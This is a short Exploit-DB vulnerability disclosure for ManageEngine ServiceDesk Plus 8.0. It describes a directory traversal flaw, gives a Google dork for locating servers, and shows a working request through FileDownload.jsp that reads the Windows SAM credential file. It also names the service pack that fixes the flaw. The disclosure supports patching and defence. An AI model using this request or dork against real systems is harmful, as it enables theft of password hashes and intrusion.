ManageEngine ServiceDesk Plus 8.0 – Directory Traversal

• Exploit Database
• 7 阅读

• 作者： Keith Lee
  日期： 2011-06-23
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/17437/

• Google Dork:	ie: intitle:ManageEngine ServiceDesk Plus"
  Author:		Keith Lee (keith.lee2012@gmail.com), @keith55,
  http://milo2012.wordpress.com
  Software Link:	http://www.manageengine.com/products/service-desk/91677414/ManageEngine_ServiceDesk_Plus.exe
  Version:	8.0
  
  Description:
  
  Directory traversal vulnerabilities has been found in ManageEngine
  ServiceDesk Plus 8.0 a web
  based helpdesk system written in Java.
  
  The vulnerability can be exploited to access local files by entering
  special characters in variables used to create file paths. The attackers
  use �../� sequences to move up to root directory, thus permitting
  navigation through the file system.
  
  Request:
  GET http://[webserver
  IP]:8080/workorder/FileDownload.jsp?module=agent&&FILENAME=%20..\..\..\..\..\..\..\..\..\windows\repair\SAM
  
  The issue is fixed with Service Pack Build 8012 found in the below link.
  http://www.manageengine.com/products/service-desk/91677414/ManageEngine_ServiceDesk_Plus_8_0_0_SP-0_12_0.ppm
  
  
  -- 
  Keith
  
  Blog: http://www.milo2012.wordpress.com
  Twitter: @keith55